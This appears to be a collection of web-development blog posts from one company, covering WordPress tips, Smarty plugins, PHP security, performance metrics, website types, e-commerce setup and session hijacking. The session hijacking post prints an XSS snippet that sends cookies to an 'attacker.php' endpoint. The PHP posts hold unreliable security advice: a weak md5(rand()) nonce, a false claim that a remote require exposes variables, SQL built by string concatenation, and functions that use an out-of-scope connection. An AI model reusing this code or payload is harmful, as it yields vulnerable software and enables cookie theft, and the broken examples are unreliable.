WordPress best practices to make your website fast, user-friendly, and more reliable.

We know you’re going to take on some incredible work next year, so before you get too crazy with new clients or preoccupied with projects, take the time to make your existing sites and workflow shine! Your WordPress website can be taken to a better performance level and can become more usable following a few best practices.

We have jotted down some of the best practices to make our work simple. Read the article to explore more.

1. Always make site updates in a test environment

This first tip earned the number one spot on my list for a very important reason: You should keep it in mind for everything else we’re going to talk about.

When you make changes directly to your live site, you run the risk of something causing your site to crash. And if your site is tied to your business, downtime is critical to avoid at all times, as that could mean a loss in sales.

To eliminate this unnecessary risk, you can use a test environment to update your WordPress site. For quick fixes, a staging site would work well. If you’re testing functionality or brand new site design, I recommend a local environment. If you haven’t worked with a test environment before, try setting up a local environment on a local machine to play with the stuff.

2. Get to know the Gutenberg editor (WordPress 5.0)

WordPress 5.0 was released at the end of 2018, which introduced the Gutenberg editor. Even if you’re planning to use the Classic Editor Plugin for a while (which will be supported until December 31st, 2021), it’s worth getting to know our new friend Gutenberg this year.

I recommend setting up a local WordPress site running version 5.0, so you can safely experiment with the new editor without any risk to your real site.

If you’re a content creator, try creating a new post with Gutenberg so you can see how it feels to use blocks. You may also get a few new ideas for formatting future articles!

If you’re a developer, you can import a copy of your live site into your local environment, and then update to WordPress 5.0 to do some troubleshooting. This will allow you to see how your site’s existing content reacts to Gutenberg, so you can put a plan in place to update the live site.

3. Update your themes and plugins

This WordPress tip is nothing new, but it’s so important that it’s worth including in any best practice list! Now’s the perfect time to audit your themes and plugins to make sure they’re up to date and running as they should be.

While it may feel tedious to run through all the sites you manage just to update these things, it’s incredibly important for both site speed and security. Outdated versions may have vulnerabilities that put the site at risk and imagine how much more time it’s going to take to fix a site with malware.

4. Make sure your sites are mobile-friendly

This best practice also isn’t new, but it remains incredibly important: Your website needs to be fully responsive and mobile-friendly.

If you’re using well-maintained WordPress themes and plugins that are up to date (which, according to the last tip, you should be!), there’s a decent chance your site automatically performs pretty well on smaller screens. (Thanks, WordPress developers!)

If you’re running a custom site design, however, you might have to think a little more intentional about making sure your site is mobile-friendly. And again, if you identify any changes you need to make, test them in a local environment or staging site first. Otherwise, site visitors might stumble across a pretty weird experience on your site while you’re in the middle of updates!

5. Add SSL certificates to every site

There was a point in time where SSL certificates were only considered important for certain types of sites, like eCommerce shops or online bank portals that were handling sensitive client information. Today, however, having an SSL certificate on your site is considered a best practice, even if you’re just building a personal blog.

Google has even started flagging sites without an SSL certificate as “not secure,” which is definitely not something you want showing up on your website.

If you don’t have an SSL certificate installed, start with your hosting provider. Many will actually provide SSL certificates (a common benefit of managed WordPress hosts). CLOUDPOKO offers Simple SSL, a free certificate powered by Let’s Encrypt, for every site.

6. Find your favorite tools

This tip is all about helping you have a more productive and efficient year when it comes to building sites for clients. One of the best ways to improve your workflow is to simplify the number of WordPress themes, plugins, add-ons, apps, extensions, etc. that you use.

Sure, there will always be new challenges to solve and unique site requirements but do a little audit of all the tools you use. Is there any overlap? Can you simplify?

For example, when it comes to WordPress themes, do you have a single framework you always start from? Or maybe a theme company you trust? Or does every new site design require a bunch of research time to identify a brand new solution?

If you haven’t found your favorite tools yet, that’s okay. But make sure you increase efficiency by defining your go-to options, so researching a custom solution is the exception, not the rule.

7. Involve your clients in the design and development process

There’s almost nothing worse than making a ton of progress on a project, only to find out the client isn’t happy about a major part of it. This year, prioritize client feedback regularly throughout the project, to ensure everyone is always on the same page!

When you’re onboarding a new client, take the time to get to know their business, what they like/dislike about other websites, and their goals for the year. Using a client questionnaire can help standardize that process so you don’t forget anything in the first stage of a project!

Once the project is in motion, check in with your client during different phases, including wireframes, mockups, development, etc. If you’re using Local to build the site, you can even send clients a link to the site on your machine, giving them a chance to preview a working version.

By getting feedback early on, you’ll prevent major changes down the road and keep your clients smiling!

Following the above simple steps, you will be able to make your WordPress based website more worth it.
Keep Developing And Keep Learning!

How To Create Custom PHP Functions to use in Smarty Templates?

Smarty, the popular template engine that serves as a basis for many well-known content management systems such as Xoops, MovableType, and X-Cart, is full of great features. But it is not the most intuitive system for developers to learn to use, and it doesn’t help that the documentation is a bit scanty in spots. So here is the simplest and most complete tutorial you will find on writing a custom function for your Smarty templates.

Why You Need To Write Custom Functions

For most purposes, the built-in Smarty functions are sufficient. But sometimes, you will want to embed a custom function in your templates in order to define certain variables or display certain content. Now if you are wondering why you can’t just use PHP directly in your template, it is because there are some limitations on what you can do.

Yes, you can insert PHP into Smarty templates. You’d do it like this:

{php}
//php code here
echo "Hello World"; //prints out Hello World
{/php}

However, there are problems with this approach. Not only is this rather inelegant, but when you use PHP directly in your template, you defeat the purpose of using Smarty. But above all, there is one caveat: you cannot insert your own custom PHP functions directly within the php tags in a template. This is clearly a big problem for those of us who need to create customized components for a website.

But you can insert your own custom function if you create a Smarty function.

How To Create Your Own Smarty Function

Smarty makes it really easy to add a function. All you need to do is follow these 3 easy steps.

Step 1: Name Your Plugin and Add a Header

To start, you’ll need an empty PHP document. And then, in PHP comments, we add simple code which describes the plugin.

In this case, our plugin will get the length of a string that is passed to it and display output based on how long it is. And our plugin will be called vbchecker. See the sample code below.

<?php
/*
 * Smarty plugin
 * -------------------------------------------------------------
 * File:     function.vbchecker.php
 * Type:     function
 * Name:     vbchecker
 * Purpose:  check string length and outputs a response
 * -------------------------------------------------------------
 */

Step 2: Write Your Function

Next, write the body of your function. There is one thing to pay attention to: all Smarty functions need to be preceded by “smarty_function_” in the function definition, as shown below. And, whether or not your function takes an input, you will always define it with two parameters: $params and &$smarty.

function smarty_function_vbchecker($params, &$smarty)
{
    $length = strlen($params['vbstring']);
    $output = "Your sentence is too long. Shorten It!";
    if($length < 50)
        $output = "Your sentence is just right!";
   
    return $output;
}
?>

And there you have it. You will notice that we referenced an external variable via the $params array.

Step 3: Save It In The Plugins Folder

Now, to add your new function to Smarty, you just need to save it in the plugins directory of your Smarty folder. (ie. Smarty-2.6.3 ⇒ plugins )

Be sure to save the plugin according to the file name that you specified in the header of your plugin.  

And that’s it! All that is left to do is use the new function in your template.

Calling Your New Function Within Your Template

To call your new function, you simply reference it by its name within curly brackets. And if the function requires a parameter, like ours does, you’d call it like this:

{vbchecker vbstring='See, it is very easy to write a function.'}

Obviously, this is a very simple example, but using these steps you can create very useful custom functions for your templates.

Software Development after Covid-19: A requirement not a choice.

The COVID-19 has turned consumer behavior inside out. We order groceries online and takeout from restaurants. Retailers offer online ordering with no-contact pickup. Students take their classes at the kitchen table. All of these are stark reminders that digital business is now a requirement, not a choice.

The pandemic will pass at some point — but the impact of new behavior patterns will live on. The figure below explores just some of the changes we believe can turn chaos into a catalyst for change—and enable businesses to leap forward.

Reimagining software engineering

Naturally, these shifts will force changes in the way businesses approach software engineering. To adapt to new behavior patterns, companies must reimagine the way they build software. There is a plethora of architectures, design patterns, technologies, infrastructure possibilities, and development methods from which to choose. Regardless, building resilient, highly adaptable software requires three strategic imperatives:

A cohesive business and software product strategy. 

The pandemic drives home the fact that software is now core to every business in every industry. The goal is to create software products built with customer needs in mind.

Organizations must ask themselves several questions as they revisit their software strategy. Can customers do business with us anytime, anywhere? Do we have the right channels of engagement (browser, mobile app and voice, for example)? Is the experience so intuitive that customers can use it with little or no training? (To get an honest answer, we advise enterprises to look beyond power users and their usual digital-channel customers to their Great-Uncle Seymour, who’s hardly tech-savvy but has been suddenly thrust into an online world.) Finally, is the customer experience both functional and elegant?

A robust, secure and scalable cloud strategy. 

The question isn’t whether to move to the cloud; most companies are already somewhere on that journey. The more pertinent question is how to get the most value from the cloud. Considerations here include: Can our applications take full advantage of cloud-scale, automation and elasticity? For businesses that are simply lifting and shifting monolithic applications to the cloud, the answer is no; to answer yes, they need a cloud-friendly or cloud-native application architecture.

Moreover, enterprises must ask if their applications are secure. Cloud-native architectures make deployments more distributed, and therefore more complex. An honest “yes” answer requires a holistic approach to security, with technologies that can secure thousands of containers and web application firewalls or more sophisticated runtime application self-protection.

The final question here: Can we detect and resolve issues quickly enough to avoid a major loss of revenue and customer trust? Application monitoring (observability) and troubleshooting support are important for all complex, distributed applications – and especially for cloud deployments.

Transforming while performing

As the COVID-19 pandemic subsides, the strongest businesses will be the ones that get these recommendations right. We recommend that businesses get a head start now by:

  • Stepping up transformation and modernization efforts in digital channels and supply chains. If organizations don’t already have a digital channel for customers and suppliers, they should start building one immediately so they can respond swiftly to new business patterns. Within these channels, internal and external access should be treated the same way, ensuring that authorized users can access them anytime, anywhere.
  • Accelerating cloud migration and modernization to take advantage of cloud scale, automation and elasticity. Companies should set their sights beyond simply shifting applications to the cloud, which provides limited benefits. Instead, it’s important to modernize legacy applications by re-factoring monolithic code into microservices, thus reducing the time required to adapt to new user needs. Businesses should think about application security holistically rather than focusing on edge security alone.
  • Tapping into a global workforce – either directly or by partnering with an IT service provider with established processes and a culture for working anywhere, anytime. 

A black swan event, while tragic for many, always brings opportunity for those who are able to see it. As the world continues to address the COVID-19 crisis, forward-looking organizations will alter course to continue to address customer needs.

For more information, contact us.

Website Security – PHP: Implementing Security To Your Website

Security is one of the major concerns today and when it comes to coding, It becomes a point to re-think what are the best possible ways to implement security to the website.

We have jotted down the basic concepts of web security (in php) which can be used to secure your code from being misused and to which can protect you from some basic attacks.

Use of Nonce

Nonce is basically used to identify if the user is sending request from a valid location. Location here means from a webpage that has been served by the genuine server.

How it works

As the name suggests, it is a combination of occasions.

When a user sends the initial request to a website, the server generates an unique session for the user, which is used to identify the user every-time.

But it is hard to justify if the webpage which is submitting the request is on the same website. Eg. If I have a form on my website with the following code

<form method="post" action="login.php">
<input type="text" name="username" />
<input type="password" name="password" />
<input type="submit" name="submit"/>
</form>

It simply suggests that the data with the key “username” and “password” will be sent to the page named “login.php”.

The same form can be developed on an automation tool in some X machine and can be used to send request to the website, which can lead to security breach

To justify, if the form is submitted from a location from the website itself. A nonce is used.

<?php
session_start();
$_SESSION['nonce'] = md5(rand(1111,99999));
$nonce = $_SESSION['nonce'];
?>
<form method="post" action="login.php">
<input type="text" name="nonce" value="<?php echo $nonce; ?>" readonly/>
<input type="text" name="username" />
<input type="password" name="password" />
<input type="submit" name="submit"/>
</form>

In the above set of code, we have generated a random number which is then hashed using the md5() hashing technique, and stored in the nonce variable.

The same value is stored in the session too. Once someone opens up the website, the nonce will be generated and will be stored in the unique session of the user, when he submits the form, the nonce will be sent back to the server, which will be validated to see if it matches the original nonce. If it matches, then it is coming from a valid source and if not, it is not from a valid location.

<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password']) && isset($_POST['nonce'])){
if($_SESSION['nonce']==$_POST['nonce']){
 echo "Submited from a valid source";
}
else{
 echo "Submitted from an invalid source";
}
}
$_SESSION['nonce'] = md5(rand(1111,99999));
$nonce = $_SESSION['nonce'];
?>
<form method="post" action="login.php">
<input type="text" name="nonce" value="<?php echo $nonce; ?>" readonly/>
<input type="text" name="username" />
<input type="password" name="password" />
<input type="submit" name="submit"/>
</form>

Securing files from being required/included in a file outside of website.

It is a general practice to create generic code and requiring or including it in the files where needed.

This is a great way to implement the concept of Don’t Repeat Yourself (DRY), but there is a security breach that can come into picture here too.

Look at the following codes:

connection.php

<?php
 $connection = mysqli_connect('hostname', 'user','password','database');
?>

save.php

<?php
 require('connection.php');
 //some mysql transaction code goes here
?>

In the above two files, connection.php and save.php, you can see that the file just needs to be written in require() function and it will get required.

The file connection.php can be required from any other source and can be used to showcase all the connection information from any other machine.
For example, anyone can use the global path for the same file to require it in his/her code as below

hackerFile.php

<?php
 require('https://abc.com/connection.php');
 print_r($connection);
?>

The above code will show all the connection information.

To secure it, we can define a variable which can be used as a token to check if it is being requested from a valid location. For example

connection.php

<?php
if(!defined('uniquenamevariable')){
 die('Nothing Found');
}
 $connection = mysqli_connect('hostname', 'user','password','database');
?>
<?php
define('uniquenamevariable',true);
 require('connection.php');
 //some mysql transaction code goes here
?>

So if anyone will require it using a absolute path, he will be unknown of the unique variable name defined in the php code, which will stop him from digging inside the code.

There are a lot other security ways, stay tuned to our blogs to learn more...

Total Blocking Time (TBT): How it affects your website?

It’s great to create a website and move your business online. Almost everyone does the same but there are certain things that you don’t notice while you start with your awesome world of internet. One of them is Total Blocking Time (TBT)

The total blocking time is the matrix that is used to consider the performance of the website.

Total Blocking Time (TBT) is a time based metric that describes JavaScript main thread activity. It is useful for understanding how long a page is unable to respond to user input.

TBT is designed to be more reliable than Time to Interactive, which can show more variation due to rogue JavaScript tasks.

How is Total Blocking Time calculated?

Total Blocking Time totals the duration ”blocking period” of long JavaScript tasks that occur after First Contentful Paint and before Time to Interactive. The blocking period is the duration of a task that is over 50ms. For example, a task that is 120ms in duration will be calculated as 70 ms of blocking time.

The total blocking time for 2 tasks of 120 ms and 75 ms will be 95 ms.

What Total Blocking Time measurement is fast?

Pages with < 300 ms of blocking time can be considered as fast, 300—600 ms as average whereas durations over 600 ms are considered slow. Learn more about Total Blocking Time.

Good TBT MeasurementPoor TBT Measurement
≤ 300ms> 600ms

How to reduce Total Blocking Time ?

To learn how to improve TBT for a specific site, you can run a Lighthouse performance audit and pay attention to any specific opportunities the audit suggests.

To learn how to improve TBT in general (for any site), refer to the following performance guides:

Common variations of the website, choose which suits you the best.

There are lots of options for creating websites, here we are going to share you some common types of websites to give you helpful ideas. These include Blogs, Corporate or Business, e-Commerce, Portfolio or Photography, Crowdfunding, News/Magazine portal, Social media, Educational website, portal, entertainment, directory listing website, quiz website, Non Profits or Religious websites, Niche Affiliate Marketing Websites, School or College Websites and a wiki or community forum.

We anatomize some of them here.

1. Blogs or Personal Website

Are you an upstanding writer? Do You have ideas and thoughts which you want to share with others? Are you looking for a platform to do this?

A blog is a perfect space for you. The blog can be typically managed by an individual or a small group, a blog can cover any topic – whether it’s related to travel tips, financial advice, or movie reviews. While blogs are often written in an informal or conversational style. Paid blogs or professional blogging are good ways of earning money online.

You can learn how to Start your first blow Today here

2. Business Website

Are you a startup company? Thinking about where to start? So, first, get your business online. Online presence is important nowadays for every business. Most businesses don’t have their website and due to this their impression on potential clients goes down. Having online presence gives you a global presence and exposure.

The business website is not for selling anything, but you can use these websites to provide information about your ventures and to let your clients or customers know how they can get in touch with you. 

Business or Corporate website doesn’t cost much You can start building your business website with help of CRMs like WordPress easily and quickly without coding knowledge.

3. e-Commerce Website

The most trending and innovative way of earning these days. You can receive payment, manage inventory, shipping, taxes/ and manage users from same canopy.

You can merge your business website, blog website with your e-commerce website. These will be helpful in your marketing also, you can write blogs for promoting your products.

Click here to learn how to build an ecom website without knowledge of coding

e-Commerce website

4. Portfolio Website

Portfolio website is similar to your physical portfolio. But, here you can design and add some interactive ideas to make it more impressive.

A portfolio is generally used to showcase and promote your previous work. It can be used as a CV, creating a great impact on the companies you walk in. Whether you are a student or employer, you may need a platform where you may showcase your work or projects or any services to inspire others.

5. Brochure Website

The brochure website is your online business card. It is quite similar to portfolio website, but the difference is that you may showcase your projects on your portfolio which you have done in your entire career, a brochure website is for showing your selected projects designed for your clients as well as personal projects.

You may use back-links in the brochure website to your portfolio website. The brochure website may have only 5-6 pages. The only information found on the site focuses entirely on the business (not the customers) and is typically limited to these pages.

  • About Us (company history, values, mission, team, etc.)
  • Contact Us (phone number, email address, and contact form)
  • How it Works (for businesses with processes or systems)
  • Pricing (If pricing isn’t straightforward)
  • Portfolio (samples or external links)

6. Niche Affiliate Marketing Websites

You have lot of contacts and you may have always share some new products and services to them. So, this is great option for you to earn from home.

Start your affiliate marketing website and earn by sharing products with your contact.

Also, you can also kick start your talent by selling hosting, domain, or other Online services by simply joining Affiliate programs by good companies like CLOUDPOKO

Affiliate marketing website

7. Portal Website

A Portal website is used for internal businesses, schools, or institutions. This involves the login process and automation of workflow from the same place. These portals are quite complex to design, so this needs an expert.

M/s VIKASH TECH provides, best professional having several years of experience in this field, they can help you to design and develop tools for you. These tools can automate your office work and help in your business growth.

8. Educational Website

Educational website as the name defines, these websites are designed for providing educational information to learners. These websites have lots of information, it may include blogs, portfolios, or portal for educating students.

You can also start your online teaching classes and become an educator to explore your knowledge.

Educational website

And lot more..

We hope you like this blog and get some ideas about different variations of the website. If you are still confused about what you want to develop, share it with us. Our expert team will provide you a better solution for your business growth. We don’t charge for any consultancy, you can call us freely and ask us any IT related queries. We will happy to serve you and share our knowledge with you. Click here to contact us.

Subscribe to our newsletter, so you will not miss our posts, news, or any offers from M/s VIKASH TECH.

E-Commerce : Want to sell online?

It is always a good idea to move your business with the latest trend. Today, when the entire world is moving towards the digital world, a good business idea will be to move online.

There are multiple platforms available where you can sell your products online like Flipkart, Amazon etc.

On these platforms, you can start selling your products by simply registering with them and listing your products on their portal. But! there are few things that might make you concerned while doing business with third party platforms

  • Your data is shared, your client is not yours it’s their client.
  • You pay their charges (market charges, service charges, etc.) that can make your product comparatively costlier.
  • You are not the only seller there! you have competitors who are selling same product on same platform.
  • Your payment is transferred to you on the 14th day or 30th day of transaction
  • They hold the rights to let you do business online.
  • You might not find a place to sell your customized product as it do not fit in the categorization of those companies.

and a lot more reasons can be there when you do not find the ready to use market fruitful for you.

So, What’s Next?

Here is a great solution for people who want to sell their products online without giving the controls to anyone else’s hand. We will walk you through setting up your own e-com website using different platforms, without use of any coding.

We assume that you are a complete beginner and you don’t have any prior idea about website development. So, let’s get started!

What are the requirements to develop an e-commence website?

There are basically a few basic requirements that are required for setting up an e-com platform. You will require to purchase it from one of the many service providers out there.
But, we suggest to go for a good service provider, and while talking about the requirements, we’ll love to suggest you the best ones as per our experiences.

  • Domain Name – The Universal Resource Location (URL) name that will be used to access your website. (Eg. abc.com)
  • Web Hosting – The place where your website files will be kept. In simple word a machine to host your website.
  • SSL – An SSL certificate protects your customers’ sensitive information such as their name, address, password, or credit card number by encrypting the data during transmission from their computer to your web server.
  • Payment Gateway – For accepting Payment online.

You can buy Domain name, Web hosting and SSL from CLOUDPOKO.COM, as this is one of our trusted service providers.

Moving forward, after purchasing the domain, hosting, and SSL we come to our next question.

How to setup our E-Com website?

We assuming that you purchased the hosting from CLOUDPOKO.COM, you will log into your hosting panel (Control Web Panel – CWP panel). You will get an option in the left side menu bar named “Script Installer“. Click on it and you will find a sub-menu named “Softaculous“. Click on it and you are in.

Here you will get options to install 400+ software from the list in front of you. All the software you see are open-source or free to use. So, no issues of paying to use it. Although, in some cases you need to either buy a pro version or move to a subscription for getting the full feature of software.

But hey! we do not need to buy anything now. You can choose to either setup a shopping card directly or opt for WooCommerce setup in WordPress.

In both the cases, it’s too simple and everything start working in just a few clicks.

So, either go to the e-com section in the left menu of Softaculous and choose one of the software to install, or find WordPress and click on install.

We believe, you installed the WordPress. Once your installation is complete, go to the admin section by logging in. Generally, the default path for login page is http://your-domain-name/wp-admin/

Once you are logged in, go to the plugin section and click on add new button. Now search for WooCommerce. You will find multiple plugins when you hit the search keyword. Click on the install button next to the WooCommerce plugin.

It might take some time to get installed, once installed, the install button will change to activate button. Hit it and follow the WooCommerce setup guide. This setup is similar to WordPress installation and will ask you to setup some basic details of your E-commerce website. Fill the details and complete setup.

After the setup is complete, you are good to go with your brand new E-Com website. You can now add your products and start selling it online.

You will require to setup payment gateway, or you can skip it if you want to work on Cash on Delivery (COD) model.

It is simple and can be done just in some time. You should start selling your products today! In case you need support, find us here

The 5 Best Programming Languages in 2020

It’s a great confusion to choose a programming language when it comes to either learning or developing a tool. There are hundreds of programming languages in widespread use, each with its own complexities and idiosyncrasies.

As you start working with software development, you actually start understanding and discovering which programming language will be most suitable for you, your interests, your business, and your career goals.

In the list below, we are going to discuss the best and most in-demand programming languages for many of the most common use cases including web development, mobile development, game development, and lot more.

1. JavaScript

While talking about JavaScript, I can simply say that it’s the language that one way or the other has a presence in every sector of software development. It’s impossible to be a software developer without using JavaScript these days. According to Stack Overflow’s 2019 Developer Survey, JavaScript is the most popular language among developers for the seventh year in a row. Nearly 70 percent of survey respondents reported that they had used JavaScript in the past year.

Along with HTML and CSS, JavaScript is essential to front-end web development. A majority of the web’s most popular sites, from Facebook and Twitter to Gmail and YouTube, rely on JavaScript to create interactive web pages and dynamically display content to users.

Although JavaScript is primarily a front-end language run on the browser, it can also be used on the server-side through Node.js to build scalable network applications. Node.js is compatible with Linux, SunOS, Mac OS X and Windows.

Several new technologies have also came up using JavaScript like React.js which are capturing the market.

Because JavaScript has a forgiving, flexible syntax and works across all major browsers, it is one of the friendliest programming languages for beginners.

2. Swift

If you’re interested in Apple products and mobile app development, Swift is a good place to start. First announced by Apple in 2014, Swift is a relatively new programming language used to develop iOS and macOS applications.

Swift has been optimized for performance and built from the ground up to match the realities of modern iOS development. Not only does iOS run on every iPhone and iPad, but it’s also the basis for other operating systems such as watchOS (for Apple Watches) and tvOS (for Apple TVs). In addition, Apple isn’t going anywhere as a tech industry leader, and iOS apps continue to be the most profitable in the mobile app marketplace.

3. Scala

If you’re familiar with Java—a classic programming language in its own right—it’s worth checking out its modern cousin, Scala. Scala combines the best features of Java (such as its Object Oriented Structure and its lightning-fast JVM runtime environment) with a modern twist.

As a functional programming language, Scala allows engineers to elevate the quality of their code to resemble pure math. Scala allows for concurrent programming, allowing complex procedures to be executed in parallel. Furthermore, it is a strongly typed language. Engineers can create and customize their own data types, allowing them to have the peace of mind knowing entire swaths of bugs are impossible at runtime.

4. Python

Python is perhaps the most user-friendly programming language of any on this list. It’s often said that Python’s syntax is clear, intuitive, and almost English-like, which, like Java, makes it a popular choice for beginners.

Also like Java, Python has a variety of applications that make it a versatile, powerful option when choosing the best programming language for your use case. If you’re interested in back-end web development, for example, then the open-source Django framework, written in Python, is popular, easy to learn, and feature-rich. Django has been used in the development of some popular sites like Mozilla, Instagram, and Spotify.

Python also has packages such as NumPy and SciPy that are commonly used in the fields of scientific computing, mathematics, and engineering. Other Python libraries such as TensorFlow, PyTorch, scikit-learn, and OpenCV are used to build programs in data science, machine learning, image processing, and computer vision. Python’s science and data applications make it a great choice for the academically inclined.

5. Go

One of the core languages favored by Google, Go is the little language that could. As a low-level language, Go is ideal for engineers who want to enter the field of systems programming. It encompasses much of the same functionality of C and C++ without the difficult syntax and steep learning curve. It’s the perfect language for building web servers, data pipelines, and even machine-learning packages.

As a compiled language, Go runs “close to the metal,” allowing for a blazing-fast runtime. It’s an open-source language, and ambitious developers can see their personal contributions adopted and enjoyed by programmers worldwide.

Session Hijacking

While working with codes, the biggest issues which comes in picture is the security. There are multiple ways to secure your code from known threats, one on them is session hijacking.

What is session hijacking?

Well, session hijacking, in simple words can be understood as someone else showing your ID card to enter inside your premises.

Every time, when a client connects with server, s/he is provided with a unique session ID. This session ID is used for all the communications between the user and server.

Session hijacking is a TCP security attack on user session over a network. This is generally called as man-in-middle attack, as someone sitting between the client and server looks for the session details and then presents herself / himself as the client to the server.

There are a few common methods of session hijacking

  • IP spoofing
  • Cross site scripting
  • Packet sniffing
  • Bind attack

IP Spoofing

Spoofing simply means pretending to be someone else. This is a technique used to gain unauthorized access to the computer with an IP address of a trusted host. In implementing this technique, attacker has to obtain the IP address of the client and inject his own packets spoofed with the IP address of client into the TCP session, so as to fool the server that it is communicating with the victim i.e. the original host.

Cross site scripting (XSS)

Attacker can also capture victim’s Session ID using XSS attack by using JavaScript. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and completes the instructions made by the attacker.

 <SCRIPT type="text/javascript"> 
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>

Packet sniffing

Packet sniffing is a way of session hijacking similar to IP spoofing. In this an attacker sniffs into the network and finds a way to get the session ID packets between a user and server. Once the session details is retrieve by the attacker, s/he hits the server with the same session details and pretends to be the actual client.

This can be done using tools like packet sniffer.

Attacker Sniffing for Session ID
Attacker using session ID to gain access

In the above figure, it can be seen that attack captures the victim’s session ID to gain access to the server by using some packet sniffers.

Blind Attack

If attacker is not able to sniff packets and guess the correct sequence number expected by server, brute force combinations of sequence number can be tried.

Security

To defend a network with session hijacking, a defender has to implement both security measures at Application level and Network level. Network level hijacks can be prevented by Ciphering the packets so that the hijacker cannot decipher the packet headers, to obtain any information which will aid in spoofing. This encryption can be provided by using protocols such as IPSec, SSL, SSH etc. Internet security protocol (IPSec) has the ability to encrypt the packet on some shared key between the two parties involved in communication. IPsec runs in two modes: Transport and Tunnel.
In Transport Mode only the data sent in the packet is encrypted while in Tunnel Mode both packet headers and data are encrypted, so it is more restrictive.

Session hijacking is a serious threat to Networks and Web applications on web as most of the systems are vulnerable to it.

At Network Level – You can implement SSL for allowing users to access website with https. You can add firewalls and add rules to secure you from attacks. The firewalls will also help you create tunnel for data transfer. You can use VPN for more secure network.

At Application Level – You can implement single session concept, this will ensure only a single session ID, that to from a single IP is accessing the server. You can reset sessions in a fixed interval of time and can encrypt all the data before sending it to client. Also, to prevent Cross site scripting(XSS), you can strip tags, can use X-XSS-Protection Header in your code, and multiple other options are there.

You can understand how to secure your network here

How to write generic codes ?

I have been working with students, interns and lot of great developers of future. It has always been a concern at beginning and intermediate stages to write generic codes for functionalities that are used multiple times in a project, or even sometimes when the same functionalities has to be built in different projects.

This building of generic codes have led to multiple good and bad options. It cannot be said that there are fixed parameters to build generic codes. Still, for the sake of understanding the way of digging out generic codes, I have jotted down some basic points below. If you are a serious developer, you will take away the good for you stuff.

Way-point 1

First of all, you need to start thinking from the small point but you need to keep a satellite vision on everything.

What I suggest to coders, is to develop the basic functionalities first. Separately, and with clean codes. Written with good comments of everywhere.

Let’s begin with a simple statement to showcase data from database.

This is not the best way of doing it. It’s for understanding purpose only

<?php
 //For connection with database 
 $connection = mysqli_connect('localhost','database_user','database_password', 'database_name');

 // Creating query for fetching data from "user_details" table
 $query = "SELECT * FROM `user_details`";

 //Executing query and storing data in $result variable.
 $result = mysqli_query($connection, $query);

 //checking if we get some result
 if($result){
    //If some result comes, we will iterate it and send the same as output
    while($row = mysqli_fetch_array($result)){
      //showing output as object
      print_r($row);
    }
 }
 
?>

Way-point 2

Once you are done coding the basic part. You can move forward with doing the changes. The changes that we are going to discuss below might first seem to be a bit confusing and multiple questions may arise in your mind. Digest them for a while, and as we go forward, all of them will be clarified.

As the basic part is developed, we need to change the basic part into functions (reusable codes), so that we can call them from anywhere just by hitting it’s name.

<?php
 //For connection with database 
 $connection = mysqli_connect('localhost','database_user','database_password', 'database_name');

//Function to fetch data
function fetchData(){
 // Creating query for fetching data from "user_details" table
 $query = "SELECT * FROM `user_details`";

 //Executing query and storing data in $result variable.
 $result = mysqli_query($connection, $query);

 //checking if we get some result
 if($result){
    //If some result comes, we will iterate it and send the same as output
    while($row = mysqli_fetch_array($result)){
      //showing output as object
      print_r($row);
    }
 }
}
//Calling the above function to show data.
fetchData();
 
?>

The above code is just to suggest “Convert basic part as a reusable code”.
Now, once you are done with it, we can move forward with making further changes and using the function for different purposes.

Way-point 3

Using same function for multiple queries can be done by parameter passing. To do this, you need to find out the parts inside the function that can be changed to provide different outputs.

In our case, we can change the query to fetch data from different table.
We can also change the query to fetch filtered data from database, using WHERE clause.
We can setup different way of outputs from the same function.

Let’s see how we can do this.

<?php
 //For connection with database 
 $connection = mysqli_connect('localhost','database_user','database_password', 'database_name');

//Function to fetch data
function fetchData($tablename, $clause ="", $output){
 // Creating query for fetching data from "user_details" table
 $query = "SELECT * FROM `".$tablename."` ".$clause;

 //Executing query and storing data in $result variable.
 $result = mysqli_query($connection, $query);

 //checking if we get some result
 if($result){
    //If some result comes, we will iterate it and send the same as output
    while($row = mysqli_fetch_array($result)){
      if($output == 'option'){
        echo "<option value='".$row['name']."'>".$row['name']."</option>";
      }

      if($output == 'object'){
        //showing output as object
        print_r($row);
      }
    }
 }
}
//Calling the above function to show data.
fetchData('user_details', 'WHERE `sno`=1', 'option');
 
?>

In the above code, you can see how the function above has been changed to be used for fetching data from any table setting up clauses and output standers too.

Way-point 4

Once you are done converting the functions to dynamic and reusable ones, you can now move forward spiting the code in different pages and using only the ones needed at a fixed time span.

Splitting code into different pages will not only help in making it more readable but also will keep it optimized and enhance the performance of the server.

Before we end, I’ll suggest you to keep security of your codes too. Make sure that you use proper filtering of data and safeguard yourself from attacks.

A simple way of filtering data before sending it to your MySQL is by using mysqli_real_escape_string(), You can use it in reusable one too.

<?php
 //For connection with database 
 $connection = mysqli_connect('localhost','database_user','database_password', 'database_name');

//function for filtering and checking if not empty
function _f($inp){
 if(!empty($inp)){
  return mysqli_real_escape_string($connection, $inp);
 }else{
  return false;
 }
}

//Function to fetch data
function fetchData($tablename, $clause ="", $output){
 // Creating query for fetching data from "user_details" table
 $query = "SELECT * FROM `".$tablename."` ".$clause;

 //Executing query and storing data in $result variable.
 $result = mysqli_query($connection, $query);

 //checking if we get some result
 if($result){
    //If some result comes, we will iterate it and send the same as output
    while($row = mysqli_fetch_array($result)){
      if($output == 'option'){
        echo "<option value='".$row['name']."'>".$row['name']."</option>";
      }

      if($output == 'object'){
        //showing output as object
        print_r($row);
      }
    }
 }
}
//Calling the above function to show data.
fetchData('user_details', 'WHERE `sno`=1', 'option');
 
?>

As you can see in the above code, I have created a function to check if the input is not empty and return the escaped string or false. It will secure my code a bit.

Why have I use a name like _f() its because, every-time I use it, I don’t want to increase the code size, rather it will only take 2 characters to call the function.

CONCLUSION

You can create reusable codes, just by starting from the basic units, and moving forward by making small small changes and taking it to a complex and more reusable code.

Always have a satellite view of your final product and start coding it from the basic part.
Your code will start changing from a fixed code to a generic code, and will be available for using it multiple times in the same project or can be used in different projects too.

How to setup a local web server ? Easiest Way..

For a developer at a beginner stage, it’s a good option to setup a local environment to learn development. Those who are ready to join the web based development stream, hear is a quick guide to setup a local server and running the codes on your local machine before you hit it to the world.

Step 1

Based on the machine that you are working on, you need to choose the tools / variants of tools.

If you are using Windows OS or Ubuntu or Mac OS, you can opt from multiple Apache-MySQL distributions available in market. Few of them are – XAMPP, WAMP, AMPPS.

